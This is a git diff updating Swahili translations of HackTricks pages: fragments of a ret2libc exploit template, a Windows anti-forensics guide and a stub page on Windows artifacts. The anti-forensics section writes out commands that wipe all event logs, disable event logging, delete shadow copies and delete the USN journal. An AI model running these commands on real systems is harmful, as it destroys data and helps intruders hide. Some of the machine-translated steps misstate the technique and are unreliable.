mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 22:18:27 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/
This commit is contained in:
parent
a26558c82a
commit
5169dbd6a6
35 changed files with 1685 additions and 1725 deletions
|
@ -1,12 +1,12 @@
|
|||
# Kuvuja libc - kiolezo
|
||||
# Kuvuja kwa libc - kiolezo
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
|
@ -14,6 +14,10 @@ Njia nyingine za kusaidia HackTricks:
|
|||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
{% code title="template.py" %}
|
||||
```python
|
||||
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
|
||||
|
@ -204,7 +208,7 @@ P.interactive() #Interact with your shell :)
|
|||
|
||||
### MAIN_PLT = elf.symbols\['main'] haipatikani
|
||||
|
||||
Ikiwa ishara ya "main" haipo (labda kwa sababu ni faili ya binary iliyokatwa). Kisha unaweza tu kuchunguza mahali ambapo msimbo wa main uko:
|
||||
Ikiwa ishara ya "main" haipo (labda kwa sababu ni faili ya binary iliyokatwa). Kisha unaweza tu kujua wapi msimbo wa main uko:
|
||||
```python
|
||||
objdump -d vuln_binary | grep "\.text"
|
||||
Disassembly of section .text:
|
||||
|
@ -226,9 +230,14 @@ Jaribu **kupunguza 64 bytes kwa anwani ya "/bin/sh"**:
|
|||
```python
|
||||
BINSH = next(libc.search("/bin/sh")) - 64
|
||||
```
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
|
@ -236,6 +245,6 @@ Njia nyingine za kusaidia HackTricks:
|
|||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,86 +1,90 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
# Vipindi vya Wakati
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
Mshambuliaji anaweza kuwa na nia ya **kubadilisha vipindi vya wakati wa faili** ili kuepuka kugundulika.\
|
||||
Inawezekana kupata vipindi vya wakati ndani ya MFT kwenye sifa `$STANDARD_INFORMATION` __ na __ `$FILE_NAME`.
|
||||
|
||||
Sifa zote zina vipindi vya wakati 4: **Mabadiliko**, **upatikanaji**, **umbaji**, na **ubadilishaji wa usajili wa MFT** (MACE au MACB).
|
||||
# Vipindi vya Muda
|
||||
|
||||
**Windows explorer** na zana zingine huonyesha habari kutoka kwa **`$STANDARD_INFORMATION`**.
|
||||
Mshambuliaji anaweza kuwa na nia ya **kubadilisha vipindi vya mafaili** ili kuepuka kugunduliwa.\
|
||||
Inawezekana kupata vipindi vya mafaili ndani ya MFT katika sifa `$STANDARD_INFORMATION` __ na __ `$FILE_NAME`.
|
||||
|
||||
## TimeStomp - Zana ya Kuzuia Uchunguzi
|
||||
Sifa zote zina vipindi 4: **Mabadiliko**, **upatikanaji**, **umbaji**, na **ubadilishaji wa usajili wa MFT** (MACE au MACB).
|
||||
|
||||
Zana hii **inabadilisha** habari ya vipindi vya wakati ndani ya **`$STANDARD_INFORMATION`** **lakini** **sio** habari ndani ya **`$FILE_NAME`**. Kwa hivyo, inawezekana **kutambua** **shughuli** **tuhuma**.
|
||||
**Windows explorer** na zana nyingine huonyesha habari kutoka kwa **`$STANDARD_INFORMATION`**.
|
||||
|
||||
## TimeStomp - Zana ya Kuzuia Upelelezi
|
||||
|
||||
Zana hii **inabadilisha** habari ya vipindi ndani ya **`$STANDARD_INFORMATION`** **lakini** **sio** habari ndani ya **`$FILE_NAME`**. Kwa hivyo, inawezekana **kutambua** **shughuli za shaka**.
|
||||
|
||||
## Usnjrnl
|
||||
|
||||
**USN Journal** (Kumbukumbu ya Nambari ya Mfululizo ya Sasisho) ni kipengele cha NTFS (mfumo wa faili wa Windows NT) ambacho kinafuatilia mabadiliko kwenye kiasi. Zana ya [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) inaruhusu uchunguzi wa mabadiliko haya.
|
||||
**USN Journal** (Update Sequence Number Journal) ni kipengele cha NTFS (mfumo wa faili wa Windows NT) kinachofuatilia mabadiliko kwenye kiasi. Zana ya [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) inaruhusu uchunguzi wa mabadiliko haya.
|
||||
|
||||
![](<../../.gitbook/assets/image (449).png>)
|
||||
|
||||
Picha iliyotangulia ni **matokeo** yanayoonyeshwa na **zana** ambapo inaweza kuonekana kuwa **mabadiliko fulani yalifanywa** kwenye faili.
|
||||
Picha iliyotangulia ni **matokeo** yanayoonyeshwa na **zana** ambapo inaweza kuonekana kwamba baadhi ya **mabadiliko yalifanywa** kwenye faili.
|
||||
|
||||
## $LogFile
|
||||
|
||||
**Mabadiliko yote ya metadata kwenye mfumo wa faili yanalindwa** katika mchakato unaojulikana kama [kuandika kabla ya kuingiza](https://en.wikipedia.org/wiki/Write-ahead_logging). Metadata iliyorekodiwa inahifadhiwa kwenye faili iliyoitwa `**$LogFile**`, iliyoko kwenye saraka ya msingi ya mfumo wa faili wa NTFS. Zana kama [LogFileParser](https://github.com/jschicht/LogFileParser) inaweza kutumika kuchambua faili hii na kutambua mabadiliko.
|
||||
**Mabadiliko yote ya metadata kwenye mfumo wa faili yanalogwa** katika mchakato unaojulikana kama [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Metadata iliyologwa inahifadhiwa kwenye faili inayoitwa `**$LogFile**`, iliyoko kwenye saraka ya msingi ya mfumo wa faili wa NTFS. Zana kama [LogFileParser](https://github.com/jschicht/LogFileParser) inaweza kutumika kuchambua faili hii na kutambua mabadiliko.
|
||||
|
||||
![](<../../.gitbook/assets/image (450).png>)
|
||||
|
||||
Tena, kwenye matokeo ya zana inawezekana kuona kuwa **mabadiliko fulani yalifanywa**.
|
||||
Tena, kwenye matokeo ya zana inawezekana kuona kwamba **baadhi ya mabadiliko yalifanywa**.
|
||||
|
||||
Kwa kutumia zana hiyo hiyo inawezekana kutambua **vipindi vya wakati vilivyobadilishwa**:
|
||||
Kwa kutumia zana hiyo hiyo inawezekana kutambua **vipindi vilivyobadilishwa**:
|
||||
|
||||
![](<../../.gitbook/assets/image (451).png>)
|
||||
|
||||
* CTIME: Wakati wa umbaji wa faili
|
||||
* ATIME: Wakati wa kubadilisha faili
|
||||
* MTIME: Ubunifu wa usajili wa MFT wa faili
|
||||
* MTIME: Mabadiliko ya usajili wa MFT wa faili
|
||||
* RTIME: Wakati wa kupata faili
|
||||
|
||||
## Linganisha `$STANDARD_INFORMATION` na `$FILE_NAME`
|
||||
|
||||
Njia nyingine ya kutambua faili zilizobadilishwa kwa tuhuma ni kulinganisha wakati kwenye sifa zote mbili kutafuta **tofauti**.
|
||||
Njia nyingine ya kutambua mafaili yaliyobadilishwa kwa shaka ni kulinganisha wakati kwenye sifa zote mbili kutafuta **tofauti**.
|
||||
|
||||
## Nanodetano
|
||||
## Nanosekunde
|
||||
|
||||
Vipindi vya wakati vya **NTFS** vina **usahihi** wa **nanodetano 100**. Kwa hivyo, kupata faili na vipindi vya wakati kama 2010-10-10 10:10:**00.000:0000 ni tuhuma sana**.
|
||||
Vipindi vya **NTFS** vina **usahihi** wa **nanosekunde 100**. Kwa hivyo, kupata mafaili na vipindi kama 2010-10-10 10:10:**00.000:0000 ni shaka sana**.
|
||||
|
||||
## SetMace - Zana ya Kuzuia Uchunguzi
|
||||
## SetMace - Zana ya Kuzuia Upelelezi
|
||||
|
||||
Zana hii inaweza kubadilisha sifa zote mbili `$STARNDAR_INFORMATION` na `$FILE_NAME`. Walakini, kuanzia Windows Vista, ni lazima kuwa na OS hai ili kubadilisha habari hii.
|
||||
Zana hii inaweza kubadilisha sifa zote mbili `$STARNDAR_INFORMATION` na `$FILE_NAME`. Walakini, kuanzia Windows Vista, ni lazima kuwa na OS hai kubadilisha habari hii.
|
||||
|
||||
# Kujificha Data
|
||||
# Kuficha Data
|
||||
|
||||
NFTS hutumia kikundi na ukubwa wa habari wa chini. Hii inamaanisha kuwa ikiwa faili inatumia kikundi na nusu, **nusu iliyobaki haitatumika kamwe** hadi faili ifutwe. Kwa hivyo, inawezekana **kujificha data katika nafasi hii ya siri**.
|
||||
NFTS hutumia kikundi na ukubwa wa habari wa chini. Hii inamaanisha kwamba ikiwa faili inatumia kikundi na nusu, **nusu iliyobaki haitatumika kamwe** hadi faili ifutwe. Kwa hivyo, inawezekana **kuficha data katika nafasi hii ya ziada**.
|
||||
|
||||
Kuna zana kama slacker ambayo inaruhusu kujificha data katika nafasi hii "iliyofichwa". Walakini, uchambuzi wa `$logfile` na `$usnjrnl` unaweza kuonyesha kuwa data fulani iliongezwa:
|
||||
Kuna zana kama slacker zinazoruhusu kuficha data katika nafasi hii "iliyofichwa". Walakini, uchambuzi wa `$logfile` na `$usnjrnl` unaweza kuonyesha kwamba data fulani iliongezwa:
|
||||
|
||||
![](<../../.gitbook/assets/image (452).png>)
|
||||
|
||||
Kwa hivyo, inawezekana kupata nafasi ya siri kwa kutumia zana kama FTK Imager. Kumbuka kuwa aina hii ya zana inaweza kuokoa yaliyomo yaliyofichwa au hata yaliyofichwa.
|
||||
Kwa hivyo, inawezekana kupata nafasi ya ziada kwa kutumia zana kama FTK Imager. Tafadhali kumbuka kwamba aina hii ya zana inaweza kuokoa yaliyomo yaliyofichwa au hata yaliyofichwa.
|
||||
|
||||
# UsbKill
|
||||
|
||||
Hii ni zana ambayo ita**zima kompyuta ikiwa kuna mabadiliko yoyote kwenye bandari za USB**.\
|
||||
Njia ya kugundua hii ni kuchunguza michakato inayoendelea na **kuchunguza kila script ya python inayoendelea**.
|
||||
Hii ni zana ambayo ita**zima kompyuta ikiwa mabadiliko yoyote kwenye bandari za USB** yatagunduliwa.\
|
||||
Njia ya kugundua hii itakuwa kuchunguza michakato inayoendelea na **kupitia kila script ya python inayoendesha**.
|
||||
|
||||
# Usambazaji wa Linux wa Moja kwa Moja
|
||||
|
||||
Distros hizi za Linux zinaendeshwa ndani ya kumbukumbu ya RAM. Njia pekee ya kugundua ni **ikiwa mfumo wa faili wa NTFS umemalizika na ruhusa za kuandika**. Ikiwa imeunganishwa tu na ruhusa za kusoma, haitawezekana kugundua uvamizi.
|
||||
Distros hizi zinaendeshwa ndani ya **kumbukumbu ya RAM**. Njia pekee ya kuzigundua ni **ikiwa mfumo wa faili wa NTFS unafungwa na ruhusa za kuandika**. Ikiwa inafungwa tu na ruhusa za kusoma haitawezekana kugundua uvamizi.
|
||||
|
||||
# Kufuta Salama
|
||||
|
||||
|
@ -88,79 +92,78 @@ Distros hizi za Linux zinaendeshwa ndani ya kumbukumbu ya RAM. Njia pekee ya kug
|
|||
|
||||
# Usanidi wa Windows
|
||||
|
||||
Inawezekana kulemaza njia kadhaa za kuingiza data za Windows ili kufanya uchunguzi wa kisayansi kuwa mgumu zaidi.
|
||||
Inawezekana kulemaza njia kadhaa za kuingiza data za Windows ili kufanya uchunguzi wa upelelezi kuwa mgumu zaidi.
|
||||
|
||||
## Lemaza Vipindi vya Wakati - UserAssist
|
||||
## Lemaza Vipindi - UserAssist
|
||||
|
||||
Hii ni ufunguo wa usajili ambao unahifadhi tarehe na saa wakati kila programu iliyotekelezwa na mtumiaji.
|
||||
Hii ni funguo ya usajili inayohifadhi tarehe na saa wakati kila programu iliyotekelezwa na mtumiaji.
|
||||
|
||||
Kulemaza UserAssist kunahitaji hatua mbili:
|
||||
|
||||
1. Weka ufunguo wa usajili mbili, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` na `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, zote kuwa sifuri ili kuonyesha kuwa tunataka UserAssist iwelemazwe.
|
||||
2. Futa matawi yako ya usajili yanayofanana na `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`.
|
||||
1. Weka funguo mbili za usajili, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` na `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, zote mbili kuwa sifuri ili kuonyesha kwamba tunataka UserAssist iwezeshwe.
|
||||
2. Futa matawi yako ya usajili yanayoonekana kama `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>`.
|
||||
|
||||
## Lemaza Vipindi vya Wakati - Prefetch
|
||||
## Lemaza Vipindi - Prefetch
|
||||
|
||||
Hii itahifadhi habari juu ya programu zilizotekelezwa kwa lengo la kuboresha utendaji wa mfumo wa Windows. Walakini, hii pia inaweza kuwa muhimu kwa mazoezi ya kisayansi.
|
||||
Hii itahifadhi habari kuhusu programu zilizotekelezwa kwa lengo la kuboresha utendaji wa mfumo wa Windows. Walakini, hii pia inaweza kuwa muhimu kwa mazoezi ya upelelezi.
|
||||
|
||||
* Tekeleza `regedit`
|
||||
* Chagua njia ya faili `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
|
||||
* Bonyeza kulia kwenye `EnablePrefetcher` na `EnableSuperfetch`
|
||||
* Chagua Bad
|
||||
* Chagua Badilisha kwa kila moja kubadilisha thamani kutoka 1 (au 3) hadi 0
|
||||
* Anza tena
|
||||
|
||||
## Lemaza Vipindi - Wakati wa Mwisho wa Upatikanaji
|
||||
|
||||
Kila wakati saraka inafunguliwa kutoka kwenye kiasi cha NTFS kwenye seva ya Windows NT, mfumo huchukua muda wa **kuboresha uga wa vipindi kwenye kila saraka iliyoorodheshwa**, inaitwa wakati wa mwisho wa upatikanaji. Kwenye kiasi cha NTFS kinachotumiwa sana, hii inaweza kuathiri utendaji.
|
||||
|
||||
1. Fungua Mhariri wa Usajili (Regedit.exe).
|
||||
2. Nenda kwa `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
|
||||
3. Tafuta `NtfsDisableLastAccessUpdate`. Ikiwa haipo, ongeza DWORD hii na weka thamani yake kuwa 1, ambayo italemaza mchakato.
|
||||
4. Funga Mhariri wa Usajili, na anza upya seva.
|
||||
## Futa Historia ya USB
|
||||
|
||||
Maelezo yote ya **Vifaa vya USB** hifadhiwa katika Usajili wa Windows chini ya ufunguo wa Usajili wa **USBSTOR** ambao una funguo ndogo zinazoundwa unapoweka Kifaa cha USB kwenye PC au Laptop yako. Unaweza kupata ufunguo huu hapa H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Kwa kufuta** hii utafuta historia ya USB.\
|
||||
Unaweza pia kutumia zana [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) ili kuhakikisha umewafuta (na kuwafuta).
|
||||
**Mingine** ya **Vifaa vya USB** huhifadhiwa katika Usajili wa Windows Chini ya funguo la Usajili la **USBSTOR** ambalo lina vichwa vidogo vilivyo umbwa unapoweka Kifaa cha USB kwenye PC au Laptop yako. Unaweza kupata funguo hili hapa H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Kufuta hili** kutafuta historia ya USB.\
|
||||
Unaweza pia kutumia zana [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) kuhakikisha umewafuta (na kuwafuta).
|
||||
|
||||
Faili nyingine ambayo inahifadhi habari kuhusu USB ni faili `setupapi.dev.log` ndani ya `C:\Windows\INF`. Hii pia inapaswa kufutwa.
|
||||
Faili nyingine inayohifadhi habari kuhusu USB ni faili `setupapi.dev.log` ndani ya `C:\Windows\INF`. Hii pia inapaswa kufutwa.
|
||||
|
||||
## Lemaza Nakala za Kivuli
|
||||
|
||||
**Pata orodha** ya nakala za kivuli kwa kutumia `vssadmin list shadowstorage`\
|
||||
**Pata** nakala za kivuli kwa `vssadmin list shadowstorage`\
|
||||
**Zifute** kwa kuendesha `vssadmin delete shadow`
|
||||
|
||||
Unaweza pia kuzifuta kupitia GUI kwa kufuata hatua zilizopendekezwa katika [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
|
||||
|
||||
Kulemaza nakala za kivuli [hatua kutoka hapa](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
|
||||
|
||||
1. Fungua programu ya Huduma kwa kuingiza "huduma" katika sanduku la utaftaji wa maandishi baada ya kubonyeza kitufe cha kuanza cha Windows.
|
||||
2. Kutoka kwenye orodha, tafuta "Volume Shadow Copy", ichague, na kisha ufikie Vipengele kwa kubofya kulia.
|
||||
3. Chagua Lemaza kutoka kwenye menyu ya kushuka ya "Aina ya Kuanza", kisha thibitisha mabadiliko kwa kubonyeza Tumia na Sawa.
|
||||
1. Fungua programu ya Huduma kwa kubonyeza "huduma" kwenye sanduku la utaftaji wa maandishi baada ya kubonyeza kitufe cha kuanza cha Windows.
|
||||
2. Kutoka kwenye orodha, pata "Nakala ya Kivuli ya Kiasi", ichague, kisha ufikie Vipengele kwa kubonyeza kulia.
|
||||
3. Chagua Lemaza kutoka kwenye menyu ya kunjua "Aina ya Kuanza", kisha thibitisha mabadiliko kwa kubonyeza Tumia na Sawa.
|
||||
|
||||
Pia ni pia inawezekana kubadilisha usanidi wa ni faili zipi zitakazohifadhiwa katika nakala ya kivuli kwenye usajili `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
|
||||
Pia niwezekane kurekebisha usanidi wa ni faili zipi zitakazokuwa zimekopwa katika nakala ya kivuli kwenye usajili `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
|
||||
|
||||
## Futa faili zilizofutwa
|
||||
## Futa Faili Zilizofutwa
|
||||
|
||||
* Unaweza kutumia **zana ya Windows**: `cipher /w:C` Hii itaagiza cipher kuondoa data yoyote kutoka kwenye nafasi ya diski isiyotumiwa inayopatikana ndani ya diski C.
|
||||
* Unaweza kutumia **Zana ya Windows**: `cipher /w:C` Hii itaagiza cipher kuondoa data yoyote kutoka nafasi ya diski isiyotumiwa inapatikana ndani ya diski ya C.
|
||||
* Unaweza pia kutumia zana kama [**Eraser**](https://eraser.heidi.ie)
|
||||
|
||||
## Futa magogo ya tukio la Windows
|
||||
## Futa Magogo ya Matukio ya Windows
|
||||
|
||||
* Windows + R --> eventvwr.msc --> Panua "Magogo ya Windows" --> Bonyeza kulia kwenye kila jamii na chagua "Futa Magogo"
|
||||
* Windows + R --> eventvwr.msc --> Panua "Vipande vya Windows" --> Bonyeza kulia kwa kila jamii na chagua "Futa Logi"
|
||||
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
|
||||
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
|
||||
|
||||
## Lemaza magogo ya tukio la Windows
|
||||
## Lemaza Magogo ya Matukio ya Windows
|
||||
|
||||
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
|
||||
* Ndani ya sehemu ya huduma, lemesha huduma "Windows Event Log"
|
||||
* Ndani ya sehemu ya huduma, lemesha huduma "Logi ya Matukio ya Windows"
|
||||
* `WEvtUtil.exec clear-log` au `WEvtUtil.exe cl`
|
||||
|
||||
## Lemaza $UsnJrnl
|
||||
|
||||
* `fsutil usn deletejournal /d c:`
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
|
|
@ -1,52 +1,56 @@
|
|||
# Windows Vitu
|
||||
# Vitu vya Windows
|
||||
|
||||
## Windows Vitu
|
||||
## Vitu vya Windows
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Vitu vya Kawaida vya Windows
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Arifa za Windows 10
|
||||
{% embed url="https://websec.nl/" %}
|
